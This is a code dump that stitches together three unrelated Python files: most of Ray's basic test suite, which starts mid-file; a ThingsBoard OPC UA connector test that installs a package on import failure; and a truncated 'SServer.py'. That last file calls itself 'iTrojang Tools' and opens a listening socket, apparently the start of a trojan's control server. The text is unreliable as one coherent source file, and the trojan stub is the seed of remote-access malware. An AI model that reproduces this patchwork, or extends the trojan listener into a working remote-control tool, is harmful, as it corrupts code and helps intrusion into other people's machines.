# Define a bunch of remote functions that all return the socket name of
# the plasma store. Since there is a one-to-one correspondence between
# plasma stores and raylets (at least right now), this can be
# used to identify which raylet the task was assigned to.
# This must be run on the zeroth raylet.
@ray.remote(num_cpus=11)
def run_on_0():
return ray.worker.global_worker.node.plasma_store_socket_name
# This must be run on the first raylet.
@ray.remote(num_gpus=2)
def run_on_1():
return ray.worker.global_worker.node.plasma_store_socket_name
# This must be run on the second raylet.
@ray.remote(num_cpus=6, num_gpus=1)
def run_on_2():
return ray.worker.global_worker.node.plasma_store_socket_name
# This can be run anywhere.
@ray.remote(num_cpus=0, num_gpus=0)
def run_on_0_1_2():
return ray.worker.global_worker.node.plasma_store_socket_name
# This must be run on the first or second raylet.
@ray.remote(num_gpus=1)
def run_on_1_2():
return ray.worker.global_worker.node.plasma_store_socket_name
# This must be run on the zeroth or second raylet.
@ray.remote(num_cpus=8)
def run_on_0_2():
return ray.worker.global_worker.node.plasma_store_socket_name
def run_lots_of_tasks():
names = []
results = []
for i in range(100):
index = np.random.randint(6)
if index == 0:
names.append("run_on_0")
results.append(run_on_0.remote())
elif index == 1:
names.append("run_on_1")
results.append(run_on_1.remote())
elif index == 2:
names.append("run_on_2")
results.append(run_on_2.remote())
elif index == 3:
names.append("run_on_0_1_2")
results.append(run_on_0_1_2.remote())
elif index == 4:
names.append("run_on_1_2")
results.append(run_on_1_2.remote())
elif index == 5:
names.append("run_on_0_2")
results.append(run_on_0_2.remote())
return names, results
client_table = ray.nodes()
store_names = []
store_names += [
client["ObjectStoreSocketName"] for client in client_table
if client["Resources"].get("GPU", 0) == 0
]
store_names += [
client["ObjectStoreSocketName"] for client in client_table
if client["Resources"].get("GPU", 0) == 5
]
store_names += [
client["ObjectStoreSocketName"] for client in client_table
if client["Resources"].get("GPU", 0) == 1
]
assert len(store_names) == 3
def validate_names_and_results(names, results):
for name, result in zip(names, ray.get(results)):
if name == "run_on_0":
assert result in [store_names[0]]
elif name == "run_on_1":
assert result in [store_names[1]]
elif name == "run_on_2":
assert result in [store_names[2]]
elif name == "run_on_0_1_2":
assert (result in [
store_names[0], store_names[1], store_names[2]
])
elif name == "run_on_1_2":
assert result in [store_names[1], store_names[2]]
elif name == "run_on_0_2":
assert result in [store_names[0], store_names[2]]
else:
raise Exception("This should be unreachable.")
assert set(ray.get(results)) == set(store_names)
names, results = run_lots_of_tasks()
validate_names_and_results(names, results)
# Make sure the same thing works when this is nested inside of a task.
@ray.remote
def run_nested1():
names, results = run_lots_of_tasks()
return names, results
@ray.remote
def run_nested2():
names, results = ray.get(run_nested1.remote())
return names, results
names, results = ray.get(run_nested2.remote())
validate_names_and_results(names, results)
def test_custom_resources(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(num_cpus=3, resources={"CustomResource": 0})
cluster.add_node(num_cpus=3, resources={"CustomResource": 1})
ray.init(address=cluster.address)
@ray.remote
def f():
time.sleep(0.001)
return ray.worker.global_worker.node.unique_id
@ray.remote(resources={"CustomResource": 1})
def g():
time.sleep(0.001)
return ray.worker.global_worker.node.unique_id
@ray.remote(resources={"CustomResource": 1})
def h():
ray.get([f.remote() for _ in range(5)])
return ray.worker.global_worker.node.unique_id
# The f tasks should be scheduled on both raylets.
assert len(set(ray.get([f.remote() for _ in range(50)]))) == 2
node_id = ray.worker.global_worker.node.unique_id
# The g tasks should be scheduled only on the second raylet.
raylet_ids = set(ray.get([g.remote() for _ in range(50)]))
assert len(raylet_ids) == 1
assert list(raylet_ids)[0] != node_id
# Make sure that resource bookkeeping works when a task that uses a
# custom resources gets blocked.
ray.get([h.remote() for _ in range(5)])
def test_two_custom_resources(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(
num_cpus=3, resources={
"CustomResource1": 1,
"CustomResource2": 2
})
cluster.add_node(
num_cpus=3, resources={
"CustomResource1": 3,
"CustomResource2": 4
})
ray.init(address=cluster.address)
@ray.remote(resources={"CustomResource1": 1})
def f():
time.sleep(0.001)
return ray.worker.global_worker.node.unique_id
@ray.remote(resources={"CustomResource2": 1})
def g():
time.sleep(0.001)
return ray.worker.global_worker.node.unique_id
@ray.remote(resources={"CustomResource1": 1, "CustomResource2": 3})
def h():
time.sleep(0.001)
return ray.worker.global_worker.node.unique_id
@ray.remote(resources={"CustomResource1": 4})
def j():
time.sleep(0.001)
return ray.worker.global_worker.node.unique_id
@ray.remote(resources={"CustomResource3": 1})
def k():
time.sleep(0.001)
return ray.worker.global_worker.node.unique_id
# The f and g tasks should be scheduled on both raylets.
assert len(set(ray.get([f.remote() for _ in range(50)]))) == 2
assert len(set(ray.get([g.remote() for _ in range(50)]))) == 2
node_id = ray.worker.global_worker.node.unique_id
# The h tasks should be scheduled only on the second raylet.
raylet_ids = set(ray.get([h.remote() for _ in range(50)]))
assert len(raylet_ids) == 1
assert list(raylet_ids)[0] != node_id
# Make sure that tasks with unsatisfied custom resource requirements do
# not get scheduled.
ready_ids, remaining_ids = ray.wait([j.remote(), k.remote()], timeout=0.5)
assert ready_ids == []
def test_many_custom_resources(shutdown_only):
num_custom_resources = 10000
total_resources = {
str(i): np.random.randint(1, 7)
for i in range(num_custom_resources)
}
ray.init(num_cpus=5, resources=total_resources)
def f():
return 1
remote_functions = []
for _ in range(20):
num_resources = np.random.randint(0, num_custom_resources + 1)
permuted_resources = np.random.permutation(
num_custom_resources)[:num_resources]
random_resources = {
str(i): total_resources[str(i)]
for i in permuted_resources
}
remote_function = ray.remote(resources=random_resources)(f)
remote_functions.append(remote_function)
remote_functions.append(ray.remote(f))
remote_functions.append(ray.remote(resources=total_resources)(f))
results = []
for remote_function in remote_functions:
results.append(remote_function.remote())
results.append(remote_function.remote())
results.append(remote_function.remote())
ray.get(results)
# TODO: 5 retry attempts may be too little for Travis and we may need to
# increase it if this test begins to be flaky on Travis.
def test_zero_capacity_deletion_semantics(shutdown_only):
ray.init(num_cpus=2, num_gpus=1, resources={"test_resource": 1})
def test():
resources = ray.available_resources()
MAX_RETRY_ATTEMPTS = 5
retry_count = 0
del resources["memory"]
del resources["object_store_memory"]
while resources and retry_count < MAX_RETRY_ATTEMPTS:
time.sleep(0.1)
resources = ray.available_resources()
retry_count += 1
if retry_count >= MAX_RETRY_ATTEMPTS:
raise RuntimeError(
"Resources were available even after five retries.")
return resources
function = ray.remote(
num_cpus=2, num_gpus=1, resources={"test_resource": 1})(test)
cluster_resources = ray.get(function.remote())
# All cluster resources should be utilized and
# cluster_resources must be empty
assert cluster_resources == {}
@pytest.fixture
def save_gpu_ids_shutdown_only():
# Record the curent value of this environment variable so that we can
# reset it after the test.
original_gpu_ids = os.environ.get("CUDA_VISIBLE_DEVICES", None)
yield None
# The code after the yield will run as teardown code.
ray.shutdown()
# Reset the environment variable.
if original_gpu_ids is not None:
os.environ["CUDA_VISIBLE_DEVICES"] = original_gpu_ids
else:
del os.environ["CUDA_VISIBLE_DEVICES"]
def test_specific_gpus(save_gpu_ids_shutdown_only):
allowed_gpu_ids = [4, 5, 6]
os.environ["CUDA_VISIBLE_DEVICES"] = ",".join(
[str(i) for i in allowed_gpu_ids])
ray.init(num_gpus=3)
@ray.remote(num_gpus=1)
def f():
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
assert gpu_ids[0] in allowed_gpu_ids
@ray.remote(num_gpus=2)
def g():
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 2
assert gpu_ids[0] in allowed_gpu_ids
assert gpu_ids[1] in allowed_gpu_ids
ray.get([f.remote() for _ in range(100)])
ray.get([g.remote() for _ in range(100)])
def test_blocking_tasks(ray_start_regular):
@ray.remote
def f(i, j):
return (i, j)
@ray.remote
def g(i):
# Each instance of g submits and blocks on the result of another
# remote task.
object_ids = [f.remote(i, j) for j in range(2)]
return ray.get(object_ids)
@ray.remote
def h(i):
# Each instance of g submits and blocks on the result of another
# remote task using ray.wait.
object_ids = [f.remote(i, j) for j in range(2)]
return ray.wait(object_ids, num_returns=len(object_ids))
ray.get([h.remote(i) for i in range(4)])
@ray.remote
def _sleep(i):
time.sleep(0.01)
return (i)
@ray.remote
def sleep():
# Each instance of sleep submits and blocks on the result of
# another remote task, which takes some time to execute.
ray.get([_sleep.remote(i) for i in range(10)])
ray.get(sleep.remote())
def test_max_call_tasks(ray_start_regular):
@ray.remote(max_calls=1)
def f():
return os.getpid()
pid = ray.get(f.remote())
ray.tests.utils.wait_for_pid_to_exit(pid)
@ray.remote(max_calls=2)
def f():
return os.getpid()
pid1 = ray.get(f.remote())
pid2 = ray.get(f.remote())
assert pid1 == pid2
ray.tests.utils.wait_for_pid_to_exit(pid1)
def attempt_to_load_balance(remote_function,
args,
total_tasks,
num_nodes,
minimum_count,
num_attempts=100):
attempts = 0
while attempts < num_attempts:
locations = ray.get(
[remote_function.remote(*args) for _ in range(total_tasks)])
names = set(locations)
counts = [locations.count(name) for name in names]
logger.info("Counts are {}.".format(counts))
if (len(names) == num_nodes
and all(count >= minimum_count for count in counts)):
break
attempts += 1
assert attempts < num_attempts
def test_load_balancing(ray_start_cluster):
# This test ensures that tasks are being assigned to all raylets
# in a roughly equal manner.
cluster = ray_start_cluster
num_nodes = 3
num_cpus = 7
for _ in range(num_nodes):
cluster.add_node(num_cpus=num_cpus)
ray.init(address=cluster.address)
@ray.remote
def f():
time.sleep(0.01)
return ray.worker.global_worker.node.unique_id
attempt_to_load_balance(f, [], 100, num_nodes, 10)
attempt_to_load_balance(f, [], 1000, num_nodes, 100)
def test_load_balancing_with_dependencies(ray_start_cluster):
# This test ensures that tasks are being assigned to all raylets in a
# roughly equal manner even when the tasks have dependencies.
cluster = ray_start_cluster
num_nodes = 3
for _ in range(num_nodes):
cluster.add_node(num_cpus=1)
ray.init(address=cluster.address)
@ray.remote
def f(x):
time.sleep(0.010)
return ray.worker.global_worker.node.unique_id
# This object will be local to one of the raylets. Make sure
# this doesn't prevent tasks from being scheduled on other raylets.
x = ray.put(np.zeros(1000000))
attempt_to_load_balance(f, [x], 100, num_nodes, 25)
def wait_for_num_tasks(num_tasks, timeout=10):
start_time = time.time()
while time.time() - start_time < timeout:
if len(ray.tasks()) >= num_tasks:
return
time.sleep(0.1)
raise RayTestTimeoutException("Timed out while waiting for global state.")
def wait_for_num_objects(num_objects, timeout=10):
start_time = time.time()
while time.time() - start_time < timeout:
if len(ray.objects()) >= num_objects:
return
time.sleep(0.1)
raise RayTestTimeoutException("Timed out while waiting for global state.")
@pytest.mark.skipif(
os.environ.get("RAY_USE_NEW_GCS") == "on",
reason="New GCS API doesn't have a Python API yet.")
def test_global_state_api(shutdown_only):
error_message = ("The ray global state API cannot be used "
"before ray.init has been called.")
with pytest.raises(Exception, match=error_message):
ray.objects()
with pytest.raises(Exception, match=error_message):
ray.tasks()
with pytest.raises(Exception, match=error_message):
ray.nodes()
with pytest.raises(Exception, match=error_message):
ray.jobs()
ray.init(num_cpus=5, num_gpus=3, resources={"CustomResource": 1})
assert ray.cluster_resources()["CPU"] == 5
assert ray.cluster_resources()["GPU"] == 3
assert ray.cluster_resources()["CustomResource"] == 1
assert ray.objects() == {}
job_id = ray.utils.compute_job_id_from_driver(
ray.WorkerID(ray.worker.global_worker.worker_id))
driver_task_id = ray.worker.global_worker.current_task_id.hex()
# One task is put in the task table which corresponds to this driver.
wait_for_num_tasks(1)
task_table = ray.tasks()
assert len(task_table) == 1
assert driver_task_id == list(task_table.keys())[0]
task_spec = task_table[driver_task_id]["TaskSpec"]
nil_unique_id_hex = ray.UniqueID.nil().hex()
nil_actor_id_hex = ray.ActorID.nil().hex()
assert task_spec["TaskID"] == driver_task_id
assert task_spec["ActorID"] == nil_actor_id_hex
assert task_spec["Args"] == []
assert task_spec["JobID"] == job_id.hex()
assert task_spec["FunctionID"] == nil_unique_id_hex
assert task_spec["ReturnObjectIDs"] == []
client_table = ray.nodes()
node_ip_address = ray.worker.global_worker.node_ip_address
assert len(client_table) == 1
assert client_table[0]["NodeManagerAddress"] == node_ip_address
@ray.remote
def f(*xs):
return 1
x_id = ray.put(1)
result_id = f.remote(1, "hi", x_id)
# Wait for one additional task to complete.
wait_for_num_tasks(1 + 1)
task_table = ray.tasks()
assert len(task_table) == 1 + 1
task_id_set = set(task_table.keys())
task_id_set.remove(driver_task_id)
task_id = list(task_id_set)[0]
task_spec = task_table[task_id]["TaskSpec"]
assert task_spec["ActorID"] == nil_actor_id_hex
assert task_spec["Args"] == [1, "hi", x_id]
assert task_spec["JobID"] == job_id.hex()
assert task_spec["ReturnObjectIDs"] == [result_id]
assert task_table[task_id] == ray.tasks(task_id)
# Wait for two objects, one for the x_id and one for result_id.
wait_for_num_objects(2)
def wait_for_object_table():
timeout = 10
start_time = time.time()
while time.time() - start_time < timeout:
object_table = ray.objects()
tables_ready = (object_table[x_id]["ManagerIDs"] is not None and
object_table[result_id]["ManagerIDs"] is not None)
if tables_ready:
return
time.sleep(0.1)
raise RayTestTimeoutException(
"Timed out while waiting for object table to "
"update.")
object_table = ray.objects()
assert len(object_table) == 2
assert object_table[x_id] == ray.objects(x_id)
object_table_entry = ray.objects(result_id)
assert object_table[result_id] == object_table_entry
job_table = ray.jobs()
assert len(job_table) == 1
assert job_table[0]["JobID"] == job_id.hex()
assert job_table[0]["NodeManagerAddress"] == node_ip_address
# TODO(rkn): Pytest actually has tools for capturing stdout and stderr, so we
# should use those, but they seem to conflict with Ray's use of faulthandler.
class CaptureOutputAndError(object):
"""Capture stdout and stderr of some span.
This can be used as follows.
captured = {}
with CaptureOutputAndError(captured):
# Do stuff.
# Access captured["out"] and captured["err"].
"""
def __init__(self, captured_output_and_error):
if sys.version_info >= (3, 0):
import io
self.output_buffer = io.StringIO()
self.error_buffer = io.StringIO()
else:
import cStringIO
self.output_buffer = cStringIO.StringIO()
self.error_buffer = cStringIO.StringIO()
self.captured_output_and_error = captured_output_and_error
def __enter__(self):
sys.stdout.flush()
sys.stderr.flush()
self.old_stdout = sys.stdout
self.old_stderr = sys.stderr
sys.stdout = self.output_buffer
sys.stderr = self.error_buffer
def __exit__(self, exc_type, exc_value, traceback):
sys.stdout.flush()
sys.stderr.flush()
sys.stdout = self.old_stdout
sys.stderr = self.old_stderr
self.captured_output_and_error["out"] = self.output_buffer.getvalue()
self.captured_output_and_error["err"] = self.error_buffer.getvalue()
def test_logging_to_driver(shutdown_only):
ray.init(num_cpus=1, log_to_driver=True)
@ray.remote
def f():
# It's important to make sure that these print statements occur even
# without calling sys.stdout.flush() and sys.stderr.flush().
for i in range(100):
print(i)
print(100 + i, file=sys.stderr)
captured = {}
with CaptureOutputAndError(captured):
ray.get(f.remote())
time.sleep(1)
output_lines = captured["out"]
for i in range(200):
assert str(i) in output_lines
# TODO(rkn): Check that no additional logs appear beyond what we expect
# and that there are no duplicate logs. Once we address the issue
# described in https://github.com/ray-project/ray/pull/5462, we should
# also check that nothing is logged to stderr.
def test_not_logging_to_driver(shutdown_only):
ray.init(num_cpus=1, log_to_driver=False)
@ray.remote
def f():
for i in range(100):
print(i)
print(100 + i, file=sys.stderr)
sys.stdout.flush()
sys.stderr.flush()
captured = {}
with CaptureOutputAndError(captured):
ray.get(f.remote())
time.sleep(1)
output_lines = captured["out"]
assert len(output_lines) == 0
# TODO(rkn): Check that no additional logs appear beyond what we expect
# and that there are no duplicate logs. Once we address the issue
# described in https://github.com/ray-project/ray/pull/5462, we should
# also check that nothing is logged to stderr.
@pytest.mark.skipif(
os.environ.get("RAY_USE_NEW_GCS") == "on",
reason="New GCS API doesn't have a Python API yet.")
def test_workers(shutdown_only):
num_workers = 3
ray.init(num_cpus=num_workers)
@ray.remote
def f():
return id(ray.worker.global_worker), os.getpid()
# Wait until all of the workers have started.
worker_ids = set()
while len(worker_ids) != num_workers:
worker_ids = set(ray.get([f.remote() for _ in range(10)]))
def test_specific_job_id():
dummy_driver_id = ray.JobID.from_int(1)
ray.init(num_cpus=1, job_id=dummy_driver_id)
# in driver
assert dummy_driver_id == ray._get_runtime_context().current_driver_id
# in worker
@ray.remote
def f():
return ray._get_runtime_context().current_driver_id
assert dummy_driver_id == ray.get(f.remote())
ray.shutdown()
def test_object_id_properties():
id_bytes = b"00112233445566778899"
object_id = ray.ObjectID(id_bytes)
assert object_id.binary() == id_bytes
object_id = ray.ObjectID.nil()
assert object_id.is_nil()
with pytest.raises(ValueError, match=r".*needs to have length 20.*"):
ray.ObjectID(id_bytes + b"1234")
with pytest.raises(ValueError, match=r".*needs to have length 20.*"):
ray.ObjectID(b"0123456789")
object_id = ray.ObjectID.from_random()
assert not object_id.is_nil()
assert object_id.binary() != id_bytes
id_dumps = pickle.dumps(object_id)
id_from_dumps = pickle.loads(id_dumps)
assert id_from_dumps == object_id
file_prefix = "test_object_id_properties"
# Make sure the ids are fork safe.
def write(index):
str = ray.ObjectID.from_random().hex()
with open("{}{}".format(file_prefix, index), "w") as fo:
fo.write(str)
def read(index):
with open("{}{}".format(file_prefix, index), "r") as fi:
for line in fi:
return line
processes = [Process(target=write, args=(_, )) for _ in range(4)]
for process in processes:
process.start()
for process in processes:
process.join()
hexes = {read(i) for i in range(4)}
[os.remove("{}{}".format(file_prefix, i)) for i in range(4)]
assert len(hexes) == 4
@pytest.fixture
def shutdown_only_with_initialization_check():
yield None
# The code after the yield will run as teardown code.
ray.shutdown()
assert not ray.is_initialized()
def test_initialized(shutdown_only_with_initialization_check):
assert not ray.is_initialized()
ray.init(num_cpus=0)
assert ray.is_initialized()
def test_initialized_local_mode(shutdown_only_with_initialization_check):
assert not ray.is_initialized()
ray.init(num_cpus=0, local_mode=True)
assert ray.is_initialized()
def test_wait_reconstruction(shutdown_only):
ray.init(num_cpus=1, object_store_memory=int(10**8))
@ray.remote
def f():
return np.zeros(6 * 10**7, dtype=np.uint8)
x_id = f.remote()
ray.wait([x_id])
ray.wait([f.remote()])
assert not ray.worker.global_worker.core_worker.object_exists(x_id)
ready_ids, _ = ray.wait([x_id])
assert len(ready_ids) == 1
def test_ray_setproctitle(ray_start_2_cpus):
@ray.remote
class UniqueName(object):
def __init__(self):
assert setproctitle.getproctitle() == "ray_UniqueName:__init__()"
def f(self):
assert setproctitle.getproctitle() == "ray_UniqueName:f()"
@ray.remote
def unique_1():
assert setproctitle.getproctitle(
) == "ray_worker:ray.tests.test_basic.unique_1()"
actor = UniqueName.remote()
ray.get(actor.f.remote())
ray.get(unique_1.remote())
def test_duplicate_error_messages(shutdown_only):
ray.init(num_cpus=0)
driver_id = ray.WorkerID.nil()
error_data = ray.gcs_utils.construct_error_message(driver_id, "test",
"message", 0)
# Push the same message to the GCS twice (they are the same because we
# do not include a timestamp).
r = ray.worker.global_worker.redis_client
r.execute_command("RAY.TABLE_APPEND",
ray.gcs_utils.TablePrefix.Value("ERROR_INFO"),
ray.gcs_utils.TablePubsub.Value("ERROR_INFO_PUBSUB"),
driver_id.binary(), error_data)
# Before https://github.com/ray-project/ray/pull/3316 this would
# give an error
r.execute_command("RAY.TABLE_APPEND",
ray.gcs_utils.TablePrefix.Value("ERROR_INFO"),
ray.gcs_utils.TablePubsub.Value("ERROR_INFO_PUBSUB"),
driver_id.binary(), error_data)
@pytest.mark.skipif(
os.getenv("TRAVIS") is None,
reason="This test should only be run on Travis.")
def test_ray_stack(ray_start_2_cpus):
def unique_name_1():
time.sleep(1000)
@ray.remote
def unique_name_2():
time.sleep(1000)
@ray.remote
def unique_name_3():
unique_name_1()
unique_name_2.remote()
unique_name_3.remote()
success = False
start_time = time.time()
while time.time() - start_time < 30:
# Attempt to parse the "ray stack" call.
output = ray.utils.decode(subprocess.check_output(["ray", "stack"]))
if ("unique_name_1" in output and "unique_name_2" in output
and "unique_name_3" in output):
success = True
break
if not success:
raise Exception("Failed to find necessary information with "
"'ray stack'")
def test_pandas_parquet_serialization():
# Only test this if pandas is installed
pytest.importorskip("pandas")
import pandas as pd
import pyarrow as pa
import pyarrow.parquet as pq
tempdir = tempfile.mkdtemp()
filename = os.path.join(tempdir, "parquet-test")
pd.DataFrame({"col1": [0, 1], "col2": [0, 1]}).to_parquet(filename)
with open(os.path.join(tempdir, "parquet-compression"), "wb") as f:
table = pa.Table.from_arrays([pa.array([1, 2, 3])], ["hello"])
pq.write_table(table, f, compression="lz4")
# Clean up
shutil.rmtree(tempdir)
def test_socket_dir_not_existing(shutdown_only):
random_name = ray.ObjectID.from_random().hex()
temp_raylet_socket_dir = "/tmp/ray/tests/{}".format(random_name)
temp_raylet_socket_name = os.path.join(temp_raylet_socket_dir,
"raylet_socket")
ray.init(num_cpus=1, raylet_socket_name=temp_raylet_socket_name)
def test_raylet_is_robust_to_random_messages(ray_start_regular):
node_manager_address = None
node_manager_port = None
for client in ray.nodes():
if "NodeManagerAddress" in client:
node_manager_address = client["NodeManagerAddress"]
node_manager_port = client["NodeManagerPort"]
assert node_manager_address
assert node_manager_port
# Try to bring down the node manager:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((node_manager_address, node_manager_port))
s.send(1000 * b"asdf")
@ray.remote
def f():
return 1
assert ray.get(f.remote()) == 1
def test_non_ascii_comment(ray_start_regular):
@ray.remote
def f():
# 日本語 Japanese comment
return 1
assert ray.get(f.remote()) == 1
@ray.remote
def echo(x):
return x
@ray.remote
class WithConstructor(object):
def __init__(self, data):
self.data = data
def get_data(self):
return self.data
@ray.remote
class WithoutConstructor(object):
def set_data(self, data):
self.data = data
def get_data(self):
return self.data
class BaseClass(object):
def __init__(self, data):
self.data = data
def get_data(self):
return self.data
@ray.remote
class DerivedClass(BaseClass):
def __init__(self, data):
# Due to different behaviors of super in Python 2 and Python 3,
# we use BaseClass directly here.
BaseClass.__init__(self, data)
def test_load_code_from_local(shutdown_only):
ray.init(load_code_from_local=True, num_cpus=4)
message = "foo"
# Test normal function.
assert ray.get(echo.remote(message)) == message
# Test actor class with constructor.
actor = WithConstructor.remote(1)
assert ray.get(actor.get_data.remote()) == 1
# Test actor class without constructor.
actor = WithoutConstructor.remote()
actor.set_data.remote(1)
assert ray.get(actor.get_data.remote()) == 1
# Test derived actor class.
actor = DerivedClass.remote(1)
assert ray.get(actor.get_data.remote()) == 1
# Test using ray.remote decorator on raw classes.
base_actor_class = ray.remote(num_cpus=1)(BaseClass)
base_actor = base_actor_class.remote(message)
assert ray.get(base_actor.get_data.remote()) == message
def test_shutdown_disconnect_global_state():
ray.init(num_cpus=0)
ray.shutdown()
with pytest.raises(Exception) as e:
ray.objects()
assert str(e.value).endswith("ray.init has been called.")
@pytest.mark.parametrize(
"ray_start_object_store_memory", [150 * 1024 * 1024], indirect=True)
def test_put_pins_object(ray_start_object_store_memory):
x_id = ray.put("HI")
x_copy = ray.ObjectID(x_id.binary())
assert ray.get(x_copy) == "HI"
# x cannot be evicted since x_id pins it
for _ in range(10):
ray.put(np.zeros(10 * 1024 * 1024))
assert ray.get(x_id) == "HI"
assert ray.get(x_copy) == "HI"
# now it can be evicted since x_id pins it but x_copy does not
del x_id
for _ in range(10):
ray.put(np.zeros(10 * 1024 * 1024))
with pytest.raises(ray.exceptions.UnreconstructableError):
ray.get(x_copy)
# weakref put
y_id = ray.put("HI", weakref=True)
for _ in range(10):
ray.put(np.zeros(10 * 1024 * 1024))
with pytest.raises(ray.exceptions.UnreconstructableError):
ray.get(y_id)
@ray.remote
def check_no_buffer_ref(x):
assert x[0].get_buffer_ref() is None
z_id = ray.put("HI")
assert z_id.get_buffer_ref() is not None
ray.get(check_no_buffer_ref.remote([z_id]))
@pytest.mark.parametrize(
"ray_start_object_store_memory", [150 * 1024 * 1024], indirect=True)
def test_redis_lru_with_set(ray_start_object_store_memory):
x = np.zeros(8 * 10**7, dtype=np.uint8)
x_id = ray.put(x, weakref=True)
# Remove the object from the object table to simulate Redis LRU eviction.
removed = False
start_time = time.time()
while time.time() < start_time + 10:
if ray.state.state.redis_clients[0].delete(b"OBJECT" +
x_id.binary()) == 1:
removed = True
break
assert removed
# Now evict the object from the object store.
ray.put(x) # This should not crash.
def test_decorated_function(ray_start_regular):
def function_invocation_decorator(f):
def new_f(args, kwargs):
# Reverse the arguments.
return f(args[::-1], {"d": 5}), kwargs
return new_f
def f(a, b, c, d=None):
return a, b, c, d
f.__ray_invocation_decorator__ = function_invocation_decorator
f = ray.remote(f)
result_id, kwargs = f.remote(1, 2, 3, d=4)
assert kwargs == {"d": 4}
assert ray.get(result_id) == (3, 2, 1, 5)
def test_get_postprocess(ray_start_regular):
def get_postprocessor(object_ids, values):
return [value for value in values if value > 0]
ray.worker.global_worker._post_get_hooks.append(get_postprocessor)
assert ray.get(
[ray.put(i) for i in [0, 1, 3, 5, -1, -3, 4]]) == [1, 3, 5, 4]
def test_export_after_shutdown(ray_start_regular):
# This test checks that we can use actor and remote function definitions
# across multiple Ray sessions.
@ray.remote
def f():
pass
@ray.remote
class Actor(object):
def method(self):
pass
ray.get(f.remote())
a = Actor.remote()
ray.get(a.method.remote())
ray.shutdown()
# Start Ray and use the remote function and actor again.
ray.init(num_cpus=1)
ray.get(f.remote())
a = Actor.remote()
ray.get(a.method.remote())
ray.shutdown()
# Start Ray again and make sure that these definitions can be exported from
# workers.
ray.init(num_cpus=2)
@ray.remote
def export_definitions_from_worker(remote_function, actor_class):
ray.get(remote_function.remote())
actor_handle = actor_class.remote()
ray.get(actor_handle.method.remote())
ray.get(export_definitions_from_worker.remote(f, Actor))
def test_invalid_unicode_in_worker_log(shutdown_only):
info = ray.init(num_cpus=1)
logs_dir = os.path.join(info["session_dir"], "logs")
# Wait till first worker log file is created.
while True:
log_file_paths = glob.glob("{}/worker*.out".format(logs_dir))
if len(log_file_paths) == 0:
time.sleep(0.2)
else:
break
with open(log_file_paths[0], "wb") as f:
f.write(b"\xe5abc\nline2\nline3\n")
f.write(b"\xe5abc\nline2\nline3\n")
f.write(b"\xe5abc\nline2\nline3\n")
f.flush()
# Wait till the log monitor reads the file.
time.sleep(1.0)
# Make sure that nothing has died.
assert ray.services.remaining_processes_alive()
@pytest.mark.skip(reason="This test is too expensive to run.")
def test_move_log_files_to_old(shutdown_only):
info = ray.init(num_cpus=1)
logs_dir = os.path.join(info["session_dir"], "logs")
@ray.remote
class Actor(object):
def f(self):
print("function f finished")
# First create a temporary actor.
actors = [
Actor.remote() for i in range(ray_constants.LOG_MONITOR_MAX_OPEN_FILES)
]
ray.get([a.f.remote() for a in actors])
# Make sure no log files are in the "old" directory before the actors
# are killed.
assert len(glob.glob("{}/old/worker*.out".format(logs_dir))) == 0
# Now kill the actors so the files get moved to logs/old/.
[a.__ray_terminate__.remote() for a in actors]
while True:
log_file_paths = glob.glob("{}/old/worker*.out".format(logs_dir))
if len(log_file_paths) > 0:
with open(log_file_paths[0], "r") as f:
assert "function f finished\n" in f.readlines()
break
# Make sure that nothing has died.
assert ray.services.remaining_processes_alive()
|
test_opcua_connector.py | # Copyright 2021. ThingsBoard
# #
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# #
# http://www.apache.org/licenses/LICENSE-2.0
# #
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import uuid
from threading import Thread
from time import sleep, time
from math import sin
from thingsboard_gateway.tb_utility.tb_utility import TBUtility
from tests.connectors.connector_tests_base import ConnectorTestBase, log
try:
from opcua.ua import NodeId, NodeIdType
from opcua import ua, uamethod, Server
except ImportError:
log.error("OpcUa library - not found. Installing...")
TBUtility.install_package("opcua")
from opcua.ua import NodeId, NodeIdType
from opcua import ua, uamethod, Server
class OpcUaConnectorGeneralTest(ConnectorTestBase):
def test_number_one(self):
self._create_connector("connection_test.json")
self.assertTrue(self.connector is not None)
self.check_or_create_server()
self.connector.open()
def check_or_create_server(self):
if not hasattr(self, "test_server"):
self.test_server = Server()
self.__server_thread = Thread(target=self.__server_run, name="Test OPC UA server", args=(self.test_server,))
self.assertTrue(self.test_server is not None)
def __server_run(self, test_server):
self.test_server = test_server
class SubHandler(object):
def datachange_notification(self, node, val, data):
print("Python: New data change event", node, val)
def event_notification(self, event):
print("Python: New event", event)
@uamethod
def multiply(parent, x, y):
return x * y
self.test_server.set_endpoint("opc.tcp://0.0.0.0:4840/freeopcua/server/")
self.test_server.set_server_name("Test Server")
self.test_server.set_security_policy([
ua.SecurityPolicyType.NoSecurity,
ua.SecurityPolicyType.Basic256Sha256_SignAndEncrypt,
ua.SecurityPolicyType.Basic256Sha256_Sign])
uri = "http://127.0.0.1"
idx = self.test_server.register_namespace(uri)
device = self.test_server.nodes.objects.add_object(idx, "Device1")
name = self.test_server.nodes.objects.add_variable(idx, "serialNumber", "TEST")
name.set_writable()
temperature_and_humidity = device.add_object(idx, "TemperatureAndHumiditySensor")
temperature = temperature_and_humidity.add_variable(idx, "Temperature", 56.7)
humidity = temperature_and_humidity.add_variable(idx, "Humidity", 68.7)
battery = device.add_object(idx, "Battery")
battery_level = battery.add_variable(idx, "batteryLevel", 24)
device.add_method(idx, "multiply", multiply, [ua.VariantType.Int64, ua.VariantType.Int64], [ua.VariantType.Int64])
self.test_server.start()
try:
while self.server_running:
sleep(.1)
finally:
self.test_server.stop()
def stop_test_server(self):
self.server_running = False
def tearDown(self):
super().tearDown()
self.stop_test_server()
|
SServer.py | import socket
import sys
import threading
import colorama
import termcolor
class Server:
def __init__(self,host,port):
self.host = host
self.port = port
def ServerStart(self):
colorama.init()
version = 1 #Every Three New Commands a new version will be made
print(termcolor.colored(f'[WELCOME]You Are Using iTrojang Tools V{version}','green'))
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.bind((self.host,self.port))
s.listen(8)
connection, address = s.accept()
